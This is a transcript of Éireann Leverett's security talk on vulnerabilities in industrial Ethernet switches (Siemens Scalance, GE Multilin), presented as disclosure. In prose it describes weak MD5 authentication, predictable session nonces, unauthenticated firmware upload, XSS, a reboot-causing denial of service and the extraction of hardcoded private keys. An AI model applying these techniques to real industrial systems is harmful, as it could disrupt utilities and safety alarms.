
Eireann Leverett: Switches Get Stitches

  • 0:10 - 0:21
    Éireann: Things are blowing up, in
    industrial systems, here in Germany, this
  • 0:21 - 0:26
    year! I had hoped that these things
    wouldn't happen. This kind of future
  • 0:26 - 0:34
    wouldn't be one that we are living in. But
    unfortunately it is. And I hope that we
  • 0:34 - 0:40
    can make that better, partly through the
    course of this talk. But more, I think, in
  • 0:40 - 0:45
    the future with your help and your work.
    So I'm sorry to begin this presentation
  • 0:45 - 0:52
    with such a dark thought but: This year's
    theme is a new dawn. And it's always
  • 0:52 - 0:57
    darkest just before the dawn. So we're
    going to go through some of that darkness
  • 0:57 - 1:04
    in industrial systems and SCADA-systems to
    get to a better place, right? Now with
  • 1:04 - 1:10
    that said no hacker really gets to be
    where they are without the help of others,
  • 1:10 - 1:15
    right? We stand on the shoulders of giants
    and part of the key is not stepping on
  • 1:15 - 1:20
    their toes, on the way up. So I would like
    to say thank you to a bunch of people who
  • 1:20 - 1:25
    are here and also some people who aren't
    here. Particularly the Oslo hackerspace
  • 1:25 - 1:28
    where I hang out. And these people have
    taught me a lot of things not just about
  • 1:28 - 1:34
    technology but about life. And "Aún
    aprendo", which is how Goya signed some
  • 1:34 - 1:40
    of his last paintings and sketches - which
    basically means "I'm still learning". OK.
  • 1:40 - 1:46
    So with that said I hope that you will
    enjoy this talk with its darkness and its
  • 1:46 - 1:50
    humor all at the same time. I used to be
    in the circus, as you may have guessed from
  • 1:50 - 1:56
    the mustache. So I encourage you not just
    to view this as a technical vulnerability
  • 1:56 - 2:02
    presentation but also as kind of live
    technical standup comedy. Instead of jokes
  • 2:02 - 2:07
    we have vulnerabilities. And I hope that
    you will enjoy them. So these
  • 2:07 - 2:13
    vulnerabilities are in switches. I chose
    to focus on switches and that will become
  • 2:13 - 2:19
    clear throughout the presentation, why I
    chose to do that for industrial systems.
  • 2:19 - 2:24
    And we are looking primarily at three
    different families of switches. Because I
  • 2:24 - 2:28
    don't want to pick on any one vendor. In
    fact, the whole idea of this talk is to
  • 2:28 - 2:32
    continue giving it. I have two other
    colleagues who couldn't be here with me
  • 2:32 - 2:36
    today, who have some vulnerabilities in
    some other switches. And they look forward
  • 2:36 - 2:40
    to presenting those vulnerabilities as
    part of this presentation in the future.
  • 2:40 - 2:43
    So every time we give this presentation
    we'd like to give some new vulnerabilities
  • 2:43 - 2:50
    and show that this is systemic and endemic
    risk. So the three switches we'll be
  • 2:50 - 2:54
    looking at today are the Siemens Scalance-
    family, the GE Multilin-family and the
  • 2:54 - 2:59
    Garrettcom Magnum family. These switches
    are usually not very big. They might be 8
  • 2:59 - 3:06
    ports, they might be 24 ports. And they're
    used in a variety of different locations.
  • 3:06 - 3:13
    So this talk is for you, if you work in a
    utility, if you test industrial Ethernet
  • 3:13 - 3:17
    switches, if you manage industrial
    Ethernet networking, if you're comfortable
  • 3:17 - 3:22
    at a Linux commandline and you play with
    web apps but you don't know as much about
  • 3:22 - 3:25
    reverse engineering. Don't worry, I'm
    exactly the same. I suck at reverse
  • 3:25 - 3:32
    engineering. But I care about this stuff.
    And so I'm learning. If you are a
  • 3:32 - 3:36
    developer of firmware then I think this
    talk is for you as well. I hope you learn
  • 3:36 - 3:40
    something from it. If you like
    vulnerabilities you'll enjoy this quite a
  • 3:40 - 3:45
    lot. I'm going to be sharing with you a
    little collection I have, you know. Some
  • 3:45 - 3:52
    people collect stamps or stories or jokes.
    I collect private keys. And I like to
  • 3:52 - 3:58
    share them with other enthusiasts such as
    yourself. If you happen to work for one of
  • 3:58 - 4:01
    the switch manufacturers you know I've
    spoken to before. Some of you I get on
  • 4:01 - 4:07
    with very well. We speak regularly. Some
    of you not yet - but I hope you'll come
  • 4:07 - 4:13
    and have a chat with me later. Ok, most
    SCADA or ICS presentations go a bit like
  • 4:13 - 4:21
    this: Pwn the PLC, the RTU, the HMI - these
    are terms, you know, that all of us in
  • 4:21 - 4:24
    SCADA know. Maybe most of you know them by
    now, they're pretty popular. I hope you
  • 4:24 - 4:28
    do. But programmable logic controller,
    remote terminal unit or human machine
  • 4:28 - 4:33
    interface. And the basic idea of the
    presentation is if I pwn these things,
  • 4:33 - 4:38
    game over. Physical damage. I win. Isn't
    the world a scary place? And I encourage
  • 4:38 - 4:42
    you to demand better content. I certainly
    grew up with better content. I used to go
  • 4:42 - 4:46
    and see the presentations and the talks of
    a guy called Jason Larson. And he has a
  • 4:46 - 4:50
    fantastic example of this. I want all of
    you to try it, right now. Just think
  • 4:50 - 4:56
    about: If you had complete control over a
    paint factory. What would you do to damage
  • 4:56 - 4:59
    it? No one is going to get hurt.
    Everything's safe. It's a thought
  • 4:59 - 5:06
    experiment, right? What would you do to
    damage it? Most people can't answer this
  • 5:06 - 5:10
    question. And on certain types of
    processes I can't answer this question.
  • 5:10 - 5:13
    But other types I've worked with before
    and I can answer this question. And I
  • 5:13 - 5:18
    encourage you to ask it. But if you
    like and you want to learn more go and see
  • 5:18 - 5:24
    Marmusha's talk - I think it's tomorrow.
    Think of my talk as a frame for her talk.
  • 5:24 - 5:28
    She's going to be talking about how to
    damage a chemical process. And what you
  • 5:28 - 5:32
    need to do as an engineer to do that. And
    the reason she's doing that is to build a
  • 5:32 - 5:36
    better process in the future. You have to
    break a few things to make them work a
  • 5:36 - 5:41
    little bit better. Okay. So what's the
    point in industrial control systems
  • 5:41 - 5:48
    security? It's not credit card data. It's
    not privacy. No disrespect to my privacy
  • 5:48 - 5:52
    friends in the room. I have the deepest
    love and respect for the work that you do.
  • 5:52 - 5:58
    But confidentially ... confidentiality is
    the lowest priority for us in industrial
  • 5:58 - 6:05
    systems. It would go: Availability,
    integrity, confidentiality. And you might
  • 6:05 - 6:11
    even swap integrity and availability in
    many cases. So, you have to protect the
  • 6:11 - 6:17
    sensor data or the control signals.
    Everything else is maybe a vulnerability
  • 6:17 - 6:20
    on the path to getting this. But it's not
    the most important thing that we're trying
  • 6:20 - 6:26
    to protect. So that's why I'm attacking
    switches. That's where the process is,
  • 6:26 - 6:33
    right? Now these may not be core switches.
    They're often a little bit further down in
  • 6:33 - 6:37
    the chain. They're field devices, right.
    So you might find them in any of these
  • 6:37 - 6:45
    locations. And this last example is not
    necessarily important because oil and gas
  • 6:45 - 6:49
    is important - but it's important because
    it gives you the general format of all
  • 6:49 - 6:53
    industrial systems. You have a sensor
    network. And sensor data is traveling back
  • 6:53 - 6:59
    and forth. And you have control signal
    data. That's it, basically. You might have
  • 6:59 - 7:01
    different control signals on different
    protocols and you might have different
  • 7:01 - 7:05
    sensors on different protocols, giving you
    different values like pressure or heat or
  • 7:05 - 7:16
    whatever. But most processes follow
    basically this format. Okay. I don't do
  • 7:16 - 7:20
    SCADA 101. There are other people who do
    this. I'm trying to do a little bit, to
  • 7:20 - 7:26
    set the reference for this talk, but
    usually I avoid it. So basically there's
  • 7:26 - 7:31
    not much authentication or integrity in
    industrial systems protocols. There's not
  • 7:31 - 7:36
    much cryptography. You would expect there
    to be, maybe. I'm continually surprised
  • 7:36 - 7:40
    that I don't find any. And when I do find
    it, it's badly implemented and barely
  • 7:40 - 7:48
    works. So once you have compromised a
    switch or another part of the network you
  • 7:48 - 7:52
    can perform man-in-the-middle attacks on
    the process. Or you can create malicious
  • 7:52 - 7:56
    firmwares on these different switches. And
    that's what I'm trying to prevent. I'm
  • 7:56 - 8:00
    trying to find some of the different
    methods that people can use to produce
  • 8:00 - 8:10
    these firmwares - and then get the vendors
    to fix them, right. Okay. These are some
  • 8:10 - 8:14
    of the protocols. If you are new to this
    space, if you want to do some more work in
  • 8:14 - 8:18
    this area, but you don't know what to work
    on, take a picture of the slide or go and
  • 8:18 - 8:21
    find it later. And choose one of these
    protocols and go and work on it. We need
  • 8:21 - 8:24
    people to go to these different
    organizations. Some of them are
  • 8:24 - 8:27
    proprietary, some of them are open and
    complain that there is not enough
  • 8:27 - 8:32
    cryptography going on in this space. And
    yes you can use VPNs. But believe me, I
  • 8:32 - 8:44
    often don't find them. Okay. These are the
    switches, the specific versions of the
  • 8:44 - 8:47
    firmware, in case you're here for
    vulnerabilities instead of just me
  • 8:47 - 8:52
    waffling on about the basics. If you want
    to go and look these up, if you're a
  • 8:52 - 8:58
    penetration tester working in this space,
    you can go and find them all online. And
  • 8:58 - 9:02
    you can get a feeling for the kind of
    coding practices that go into these
  • 9:02 - 9:07
    different devices. Now I've tried to
    choose the vulnerabilities that I'm
  • 9:07 - 9:15
    presenting very carefully. To take you
    gently from web app vulnerabilities into a
  • 9:15 - 9:20
    little bit deeper into the firmware. So
    the first one we'll be looking at is
  • 9:20 - 9:25
    Siemens. And again, I'm not picking on any
    particular vendor. In fact I'm very proud
  • 9:25 - 9:30
    of Siemens. They're probably here again.
    They've been here many years. And they fixed
  • 9:30 - 9:35
    these vulnerabilities within three months.
    And I think that was awesome - especially
  • 9:35 - 9:42
    in the space that I work in. The average
    patch-time in SCADA and ICS is 18 months.
  • 9:42 - 9:46
    So I think Siemens deserves a round of
    applause for getting these fixed.
  • 9:46 - 9:53
    Applause
    So without further ado let's have some
  • 9:53 - 9:59
    fun, right. So MD5, you go to the web page
    for this switch. This is the management
  • 9:59 - 10:03
    page of a switch, right. And you interact
    with this webpage. And you have a look at
  • 10:03 - 10:13
    it. And on the client side they do MD5 of
    the password. Okay. That's fascinating. I
  • 10:13 - 10:17
    don't think that's particularly secure.
    But it's done in roughly the same format
  • 10:17 - 10:21
    as that Linux command. So I use the Linux
    command instead of the JavaScript just to
  • 10:21 - 10:26
    make it easier for everyone. You have the
    username at the beginning and the password
  • 10:26 - 10:30
    is in the middle. And then you have this
    nonce that's at the end, a number you use
  • 10:30 - 10:34
    once, right. I was surprised to see the
    nonce, and it's even called a nonce,
  • 10:34 - 10:37
    right. So somebody had done a little bit
    of homework on their cryptography. And
  • 10:37 - 10:41
    they understood that they wanted to use,
    you know, this number used once to prevent
  • 10:41 - 10:45
    replay of the hash every time. Okay,
    that's some pretty good work.
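As a sketch, the client-side scheme just described can be reproduced in a few lines. The field order (username, password, nonce) is from the talk; the ":" separator is my assumption, since the exact concatenation the device's JavaScript uses isn't given here:

```python
import hashlib

def scalance_auth_hash(username: str, password: str, nonce: str) -> str:
    # Field order as described above: username first, password in the
    # middle, nonce at the end. The ":" separator is an assumption; the
    # device's JavaScript may join the fields differently.
    material = f"{username}:{password}:{nonce}".encode()
    return hashlib.md5(material).hexdigest()

def brute_force(target_hash: str, username: str, nonce: str, wordlist):
    # MD5 is fast enough that short passwords fall in seconds; the nonce
    # only stops replay, not guessing from a captured hash.
    for candidate in wordlist:
        if scalance_auth_hash(username, candidate, nonce) == target_hash:
            return candidate
    return None
```

This is the same shape as `echo -n "admin:password:nonce" | md5sum` at a Linux command line.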
  • 10:45 - 10:49
    Unfortunately this is MD5 and this is
    protecting your electric utilities and
  • 10:49 - 10:56
    your water and your sewage systems. And
    you can brute force this in a few seconds,
  • 10:56 - 11:00
    if the passwords are less than eight
    characters. And if they're around 15 it
  • 11:00 - 11:04
    might take you 20 minutes or something.
    You can do this from PCAPs, from network
  • 11:04 - 11:08
    traffic captures. And then you have the
    cleartext password that you can use
  • 11:08 - 11:16
    forever after, with that switch. So, off
    to a bad start, in my opinion. So these
  • 11:16 - 11:23
    are the nonces that we're looking at. I'm
    glad to hear you laughing. It makes me, it
  • 11:23 - 11:27
    warms the heart, right. So you can see
    that they are incrementing and that they
  • 11:27 - 11:38
    are hex. Yeah. What else can you say about
    this? The last half is different from the
  • 11:38 - 11:46
    first half. Not only is it incrementing,
    it is sequential. If you pull them quickly
  • 11:46 - 11:53
    enough. For those of you who also do a bit
    of reverse engineering you might recognize
  • 11:53 - 11:58
    the first half as well. Anybody in the
    room see any patterns in the first half of
  • 11:58 - 12:10
    the nonces? No? Hmm? Very good: IP
    address. MAC address would have been a
  • 12:10 - 12:14
    good guess as well. I thought it was at
    first. And I got very confused when I went
  • 12:14 - 12:17
    to look for the IP address. Because I went
    to the switch itself. And the switch's IP
  • 12:17 - 12:25
    address was not this in hex. It's the
    clientside address. Which I just couldn't
  • 12:25 - 12:29
    believe, right? Like, it seems like it
    makes a sort of sense if you're trying to
  • 12:29 - 12:34
    keep session IDs in state. And it's like
    oh I want a different session for every IP
  • 12:34 - 12:39
    address. And then I'll just use time, I
    use uptime in hex as the rest of my
  • 12:39 - 12:45
    session ID, right? You know, the entire IP
    space and time, that can't be brute-forced.
  • 12:45 - 12:52
    It has a kind of crazy logic to it, right.
    Unfortunately it can be. And you can get
  • 12:52 - 12:57
    the uptime from the device using SNMP. And
    of course if you don't want to use SNMP
  • 12:57 - 13:04
    you can get old-school and use the TCP
    sequence numbers. So, not a lot of
  • 13:04 - 13:10
    entropy there, I guess, I would say. And I
    think their lawyers agreed when they put
  • 13:10 - 13:18
    out the comments on this. All right. Not
    only can you perform session hijacking.
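Under the scheme just described, the "nonce" is predictable from two observable values: the client's own IP address (hex-encoded) and the device uptime (readable over SNMP, or estimated from TCP sequence numbers). A sketch, where the exact field width of the uptime half is an assumption:

```python
def predict_nonce(client_ip: str, uptime_ticks: int) -> str:
    # First half: the HTTP client's own IPv4 address, hex-encoded octet
    # by octet. Second half: device uptime in hex, which an attacker can
    # read via SNMP sysUpTime or estimate from TCP sequence numbers.
    # The 8-hex-digit width of the uptime field is an assumption.
    ip_part = "".join(f"{int(octet):02x}" for octet in client_ip.split("."))
    return ip_part + f"{uptime_ticks:08x}"

print(predict_nonce("192.168.1.10", 0xFD2E1))  # -> c0a8010a000fd2e1
```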
  • 13:18 - 13:21
    And if you are attacking switches I'd like
    to point out that session hijacking is not
  • 13:21 - 13:25
    necessarily a great attack in this
    environment. Think about it like you would
  • 13:25 - 13:30
    at home, right. How often do you log into
    your router? In fact even more importantly
  • 13:30 - 13:33
    how often do you upgrade the firmware on
    your router? Everyone who has upgraded the
  • 13:33 - 13:38
    firmware on their router ever raise your
    hand. Just for an experiment. Thank
  • 13:38 - 13:42
    goodness, right. But wait, keep them up
    just for a minute. Everybody who's updated
  • 13:42 - 13:46
    it this year, keep your hand up. Everybody
    else put them down. Everybody who has
  • 13:46 - 13:50
    updated in the last six months ... okay
    ... So that gives you a sense of how long
  • 13:50 - 13:55
    these vulnerabilities can be in play in an
    industrial systems environment. If you
  • 13:55 - 14:02
    multiply that by about 10, right. Okay, so
    you can simply upload a firmware image to
  • 14:02 - 14:06
    a Siemens Scalance device with this
    version number without authentication. You
  • 14:06 - 14:16
    just need to know the URL. Cross-site
    request forgery, right. I just say CSRF
  • 14:16 - 14:20
    all the time. I don't even remember what
    it stands for. So you can upload or you
  • 14:20 - 14:23
    can download a logfile. Not that useful
    but you get a sense of what's going on on
  • 14:23 - 14:27
    the switch. You know what usernames might
    be present, whatever. Incidentally all of
  • 14:27 - 14:32
    these switches by default or at least this
    one only have two usernames, right. So
  • 14:32 - 14:37
    it's "admin" and "operator" I think on
    this switch. Or maybe it's not. But
  • 14:37 - 14:43
    anyway, there's two usernames "admin" and
    "manager"? I know I get them mixed up now.
  • 14:43 - 14:47
    But the configuration includes password
    hashes. I'm actually not even entirely
  • 14:47 - 14:51
    convinced they're hashes because when you
    increase the length of your password it
  • 14:51 - 14:56
    increases. But I'll leave that for future
    researchers to examine. You can download
  • 14:56 - 14:59
    the firmware image from the device, which
    is nice. So you just make a request. You
  • 14:59 - 15:03
    just post an HTTP-request to this device.
    And it gives you the firmware that it is
  • 15:03 - 15:08
    running back. That's not that big a deal,
    right. Because you're just viewing data on
  • 15:08 - 15:15
    the switch. But you can upload firmware
    and configuration to this device. Which is
  • 15:15 - 15:19
    an authentication bypass in and of itself.
    But it's also interesting because I can
  • 15:19 - 15:22
    take a configuration file from one of the
    devices that I have at home with a known
  • 15:22 - 15:27
    password. I can upload a new configuration
    file with a password that I know. I can
  • 15:27 - 15:32
    use the device to do whatever I want to
    do. And later I can re-upload the old
  • 15:32 - 15:36
    configuration file that I got from the
    device, so no one ever even realizes what's
  • 15:36 - 15:46
    been changed, right. So. I think that's a
    disappointing state of affairs. And I
  • 15:46 - 15:49
    wrote a script to do this. So that you
    wouldn't have to when you are doing
  • 15:49 - 15:54
    penetration tests of these devices. And I
    gave you a little ASCII menu because
  • 15:54 - 15:58
    sometimes I get bored. Cambridge is a
    small town and there's not much to do in
  • 15:58 - 16:06
    the evening. So feel free to go and
    examine my GitHub repository where I put
  • 16:06 - 16:12
    up some of this stuff. I'm Blackswanburst
    on GitHub, and on Twitter. So like I say,
  • 16:12 - 16:15
    Siemens are some of my favorite people. So
    I'm going to finish up with them. This is
  • 16:15 - 16:20
    old-day, if you like, all that you have
    just seen. But I want you to keep in mind
  • 16:20 - 16:24
    that these vulnerabilities will still be
    present in the wild for another two or
  • 16:24 - 16:29
    three years. And I encourage you to go and
    have a look at your systems, if you have
  • 16:29 - 16:34
    any of these devices. And check them out.
    And upgrade the firmware. I also hope this
  • 16:34 - 16:39
    encourages you that if you haven't done
    much in industrial systems and SCADA you
  • 16:39 - 16:42
    don't have to be intimidated by all of the
    engineering and the terminology, and the
  • 16:42 - 16:47
    verbiage. There is plenty for any
    of you in this room to do in the
  • 16:47 - 16:52
    industrial systems space. You need to
    spend a little time speaking to engineers
  • 16:52 - 16:57
    and translating your vulnerabilities into
    something meaningful for them. But that's
  • 16:57 - 17:00
    just a matter of spending more time with
    them and getting to know them. And I think
  • 17:00 - 17:04
    that's valuable too because they have a
    lot of experience. They care very deeply
  • 17:04 - 17:08
    about safety. And I've learned quite a lot
    of things from engineers. My general point
  • 17:08 - 17:14
    here is I'd like you to stop defending
    banks and websites and other stuff. We
  • 17:14 - 17:18
    need your help in industrial systems, in
    the utilities. We could really do with
  • 17:18 - 17:22
    living in a safer world rather than one
    where you're just protecting other
  • 17:22 - 17:32
    people's money. So we're gonna move on to
    the GE Multilin line. I worked on a GE
  • 17:32 - 17:39
    ML800 but these vulnerabilities affect
    seven of the nine switches in this family.
  • 17:39 - 17:43
    Seven because one of the other switches is
    an unmanaged switch. If you're a hardware
  • 17:43 - 17:48
    person maybe you want to go and play
    around with those, but not so much my thing.
  • 17:48 - 17:51
    And the other one uses a different
    firmware image. But seven of the nine
  • 17:51 - 17:58
    switches use a similar firmware image. GE
    offers a worldwide 10-year warranty. So
  • 17:58 - 18:02
    let's see if that includes fixing
    vulnerabilities. I think it should. What
  • 18:02 - 18:11
    do you think? No? A couple of noes, a couple
    of yeses, undecided. All right. CCC is
  • 18:11 - 18:18
    undecided on something that's novel. Let's
    start with some new vulnerabilities. Cross
  • 18:18 - 18:23
    site scripting. Reflected, I grant you, but
    still cross-site scripting, and I want you
  • 18:23 - 18:26
    to pay attention to the details. I'm not
    going to go slow for you and ask you to
  • 18:26 - 18:29
    think. I know it's morning, I know it's
    tough but I am going to ask you to think.
  • 18:29 - 18:37
    See Flash up there, flash.php, and the third
    one. Yes, it runs Flash in your browser.
  • 18:37 - 18:42
    So if you know something about Flash come
    and have a look at the switch some time. I
  • 18:42 - 18:48
    didn't go for ActionScript attacks. There is
    so much attack surface on this device. I
  • 18:48 - 18:52
    sometimes don't even know how I'm
    going to finish looking at all of them. So
  • 18:52 - 18:56
    I just work with the web interface to
    begin with. So you have this cross site
  • 18:56 - 19:01
    scripting times eight and I want you to
    notice in the last section there
  • 19:01 - 19:06
    arbitrarily supplied URL parameters. I
    don't know about you but I think that's
  • 19:06 - 19:10
    funny right. You can just make up
    parameters to stick your cross site
  • 19:10 - 19:20
    scripting in. laughs It's unbelievable
    right. Yeah. Anyways what does that look
  • 19:20 - 19:28
    like? It looks like that: they have an
    error data page. OK maybe I'm using a
  • 19:28 - 19:33
    browser that they don't approve or
    something but it deserves looking at. And
  • 19:33 - 19:39
    you can do quite a lot of things with
    javascript on the client side these days.
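Since arbitrarily supplied URL parameters are reflected, even an invented parameter name works as an injection point. A probe sketch; the page name and parameter name are hypothetical stand-ins for the real endpoints:

```python
from urllib.parse import urlencode

def xss_probe_url(host: str, page: str = "error.php") -> str:
    # "Arbitrarily supplied URL parameters" means a made-up parameter
    # name is reflected too; page and parameter names are hypothetical.
    payload = "<script>alert(1)</script>"
    return f"http://{host}/{page}?" + urlencode({"madeupparam": payload})

print(xss_probe_url("192.0.2.1"))
```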
  • 19:39 - 19:44
    Disturbing. Anyways I'm not a big fan of
    XSS so I'm going to move on to things that
  • 19:44 - 19:53
    I think are worth my time. So if you fetch
    the initial web page of this switch before
  • 19:53 - 20:01
    you've even logged in you get this config.
    So this is pre-authentication. No
  • 20:01 - 20:07
    authentication, right. Now keep in mind that
    these switches are designed for process
  • 20:07 - 20:15
    data, right. It's not carrying traffic to
    images of cats. It's supposed to be for
  • 20:15 - 20:23
    engineering. So what happens if I add a
    nocache parameter and I make it say 500000
  • 20:23 - 20:30
    digits long. I should just be able to
    crash the web server, right? Maybe, maybe.
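The probe being described is just a GET with an absurdly long parameter. A sketch that only builds the URL (the "nocache" name and ~500,000-digit value are from the talk; the host and path are placeholders, and sending this reportedly reboots the switch, so never aim it at production equipment):

```python
def nocache_dos_url(host: str, digits: int = 500_000) -> str:
    # "nocache" and the ~500,000-digit value are as described above;
    # the path is a placeholder. Build only - nothing is sent here.
    return f"http://{host}/?nocache=" + "9" * digits

print(len(nocache_dos_url("192.0.2.1")))
```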
  • 20:30 - 20:41
    But you would not expect it to reboot the
    switch. And it takes a minute or so for
  • 20:41 - 20:45
    the switch to reboot, which is actually
    really impressive; it comes up pretty quickly.
  • 20:45 - 20:51
    But you know obviously you can repeat
    this. So I wanted to examine that a lot
  • 20:51 - 20:56
    further. I wanted to know more about that
    crash, what was rebooting the switch.
  • 20:56 - 20:59
    But like I say I'm not a very good reverse
    engineer. So you're going to go on a
  • 20:59 - 21:03
    little journey with me where I learned a
    couple of things about reverse engineering
  • 21:03 - 21:06
    and I had to change my approach from
    looking at the webapp-style vulns to
  • 21:06 - 21:12
    moving into this other stuff. So why is
    DoS even interesting? You'll
  • 21:12 - 21:18
    remember that I mentioned Misha's talk. So
    the reason I mention her talk, this is it
  • 21:18 - 21:24
    right. Denial of service on a website? Who
    cares, it's tearing posters down, as xkcd
  • 21:24 - 21:29
    once famously explained to us. But in the
    industrial systems environment it's very
  • 21:29 - 21:34
    different. It can be very serious right. A
    simplistic example is you have an
  • 21:34 - 21:39
    application that has a heartbeat and if
    you stop that heartbeat it might go into
  • 21:39 - 21:44
    some sort of safety state; it might, for
    example, scram a reactor. There is a famous
  • 21:44 - 21:51
    denial of service on PLCs that did scram a
    reactor in real life. Does anybody know
  • 21:51 - 21:59
    what H2S is? Any oil and gas engineers in
    the room? Okay so H2S alerts not reaching
  • 21:59 - 22:03
    their destinations is pretty serious
    business right. For those of you who are
  • 22:03 - 22:08
    not aware of H2S it's a byproduct of
    producing oil and gas and inhaled in very
  • 22:08 - 22:13
    very small amounts you can go unconscious
    and in sort of larger amounts, respiratory
  • 22:13 - 22:18
    failure. So if you take safety
    seriously, if you ever work on these rigs
  • 22:18 - 22:23
    in these environments you learn to care
    about the wind sock, right? One of these
  • 22:23 - 22:27
    alerts goes out. An alarm goes off. There
    are many different alarms you have to
  • 22:27 - 22:31
    memorize how they all sound on a rig and
    then react to them and when you hear the
  • 22:31 - 22:35
    H2S alert you look up at the wind sock to
    keep an eye on where the wind is and
  • 22:35 - 22:40
    trying to avoid being downwind of wherever
    the leak is. So a simple denial of service
  • 22:40 - 22:44
    that we would not care about in a web
    application environment in this
  • 22:44 - 22:48
    environment can be very serious. I'm not
    saying it always is. It just can be
  • 22:48 - 22:53
    right. So denial of service goes up in our
    list of problems especially when we're
  • 22:53 - 22:58
    looking at networking devices. Okay so
    that's that's it for the denial of
  • 22:58 - 23:02
    service. But like I say we're going to
    look at some other stuff. In fact the
  • 23:02 - 23:07
    story with the switch began with a
    concerned citizen about three or four
  • 23:07 - 23:12
    years ago I found 10000 industrial systems
    on the Internet as part of my master's
  • 23:12 - 23:18
    thesis and I was pretty uncomfortable with
    that. So I sent that data to various
  • 23:18 - 23:24
    computer emergency response teams around
    the world. I believe it was 52 of them
  • 23:24 - 23:27
    right. Not all of them were critical
    infrastructure. A lot of them were small
  • 23:27 - 23:31
    stuff, but maybe 1 in 100, I was told. Or in
    one particular country, when they got back
  • 23:31 - 23:38
    to me, 1 in 20 were considered critical
    infrastructure. And after that you have a
  • 23:38 - 23:43
    sort of reputation among the computer
    emergency response teams of the world. So
  • 23:43 - 23:48
    people send you stuff you get anonymous
    e-mails from someone called Concerned
  • 23:48 - 23:53
    Citizen. Thank you very much. They sent me
    a firmware upgrade pcap of this particular
  • 23:53 - 23:57
    device. I suspect that they worked at one
    of the utilities and they wanted me to see
  • 23:57 - 24:06
    how upgrading the firmware of this GE switch
    was performed. So it all began with a pcap.
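Carving a file out of a capture by hand comes down to reassembling one direction of a TCP stream. A toy version of that step, assuming contiguous, non-overlapping segments (a packet parser would supply the `(seq, payload)` pairs from the pcap):

```python
def reassemble_stream(segments):
    # segments: (tcp_seq, payload) pairs for one direction of one TCP
    # connection. Toy model: drops exact retransmissions by keeping the
    # first payload seen per sequence number, then concatenates in
    # sequence order. Ignores overlaps and sequence wraparound.
    seen = {}
    for seq, payload in segments:
        seen.setdefault(seq, payload)
    return b"".join(seen[seq] for seq in sorted(seen))
```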
  • 24:06 - 24:11
    So I ran tcptrace to carve out all the
    files and see what was going on and you
  • 24:11 - 24:17
    could see instantly that there was an FTP
    session. Later, looking at the switch, I see
  • 24:17 - 24:21
    that you can also upgrade them over TFTP.
    So the management of the switch happens in
  • 24:21 - 24:27
    HTTPS and is encrypted, but the firmware
    upload goes across FTP, right? So you can
  • 24:27 - 24:34
    just carve the file out, a little bit of
    network forensics I guess. So instantly I
  • 24:34 - 24:37
    could see that this one is complete and
    the ports on the end of the numbers give
  • 24:37 - 24:41
    me a clue of what's going on in the larger
    stream. This one seems interesting. Let's
  • 24:41 - 24:48
    have a look at it. So, I tried running
    file and binwalk. I don't know about you,
  • 24:48 - 24:53
    but I believe that hacking is a journey of
    understanding. In fact, hacking is
  • 24:53 - 24:58
    understanding a system better than it
    understands itself and nudging it to do
  • 24:58 - 25:04
    what you want right. And I also feel that
    I should understand my tools. I don't
  • 25:04 - 25:07
    really understand my tools until I know
    where they're going to fail me or they
  • 25:07 - 25:11
    have failed me in the past and in this
    particular case I think binwalk is a
  • 25:11 - 25:15
    fantastic tool and file is a fantastic
    tool. But they didn't tell me anything and
  • 25:15 - 25:19
    that was that was a journey of discovery
    for me. So that was nice. It was like OK
  • 25:19 - 25:22
    binwalk doesn't always give me everything.
    I think I was running an older version and
  • 25:22 - 25:25
    I think it would handle it now. But the
    point is, after binwalk didn't give me
  • 25:22 - 25:25
    anything, just resort to the old-school
    stuff, right. Go strings, and I found these
  • 25:30 - 25:34
    deflate and inflate copyright strings and
    I could tell that a certain portion of the
  • 25:34 - 25:44
    file was compressed. This is just from the
    pcap. Remember this whole story. So I
  • 25:44 - 25:49
    tried to deflate the whole thing. That
    didn't work again. I just did something
  • 25:49 - 25:55
    simple: a Python script that checks
    every byte to see which parts of the file
  • 25:55 - 26:01
    don't produce ZLIB errors when you try and
    decompress them and you figure out what
  • 26:01 - 26:09
    sectors of this file are compressed. So
    you go to your friend dd and you carve out
  • 26:09 - 26:16
    this section of the file right. So we have
    this larger firmware image with this
  • 26:16 - 26:21
    little compressed section and we have now
    cut this little compressed section out. I
  • 26:21 - 26:24
    suppose I could have loaded this up into
    python and use ZLIB to decompress it. But
  • 26:24 - 26:28
    at the time I was still trying to use
    command line tools and someone said I'll
  • 26:28 - 26:35
    just concatenate the gzip bytes on it.
    Gzip inherits from inflate and deflate. So
  • 26:35 - 26:39
    if you just concatenate the bytes it
    should still handle it. So I did that and
  • 26:39 - 26:44
    I got a decompressed binary. When you ran
    strings on that it started to make a lot
  • 26:44 - 26:49
    more sense and you could find the opcodes
    in it where previously it didn't make any
  • 26:49 - 26:54
    sense at all. So once you've got an image
    like that what do you do. Well if you're
  • 26:54 - 26:58
    me you just grep for bugs. I think I
    learned that from Ilija. If he's here in
  • 26:58 - 27:06
    the room thank you. Thank you very much. I
    asked him like a year or two ago. How do
  • 27:06 - 27:11
    you how do you find so many bugs. And he
    said: "Oh, I just, you know, I grep for
  • 27:11 - 27:17
    them, I use find." laughs And so I
    started thinking about firmware images.
  • 27:17 - 27:20
    Like if I was going to grep for a bug in a
    firmware image what would it be. And my
  • 27:20 - 27:24
    answer is hardcoded credentials and
    default keys because you find them every
  • 27:24 - 27:29
    single time so I have this command aliased
    on my machine and I just grep for it and I
  • 27:29 - 27:35
    find private keys and this is how you too
    can end up with a private key collection.
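A Python equivalent of that grep alias, matching the standard PEM private-key delimiters (the firmware filename in the comment is hypothetical):

```python
import re

PEM_RE = re.compile(
    rb"-----BEGIN (?:RSA |DSA |EC )?PRIVATE KEY-----"
    rb".*?-----END (?:RSA |DSA |EC )?PRIVATE KEY-----",
    re.DOTALL,
)

def extract_private_keys(blob):
    """Return every PEM private-key block found in a binary blob."""
    return PEM_RE.findall(blob)

# keys = extract_private_keys(open("firmware.bin", "rb").read())
```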
  • 27:35 - 27:40
    So, there you go.
  • 27:40 - 27:50
    Applause
  • 27:50 - 27:54
Yeah, they're hardcoded keys,
but what are they for? It doesn't
  • 27:54 - 27:58
    stop there. You know you've got the keys,
    but what do they do, right? That was the
  • 27:58 - 28:02
    next step of the journey for me. Two of
them you can see; one's encrypted with a
  • 28:02 - 28:06
    password; we'll come back to that one
    later. Let's start with the one on the
  • 28:06 - 28:16
    left. If you load this key up into
Wireshark, and you use it to decrypt the
  • 28:16 - 28:23
    SSL you have a self decrypting pcap.
    Remember at the beginning it was using
  • 28:23 - 28:30
    HTTPS to manage the device and upload this
    firmware image. So if you happen to have
  • 28:30 - 28:37
    this firmware image you can decrypt all
    the traffic. No forward secrecy, right?
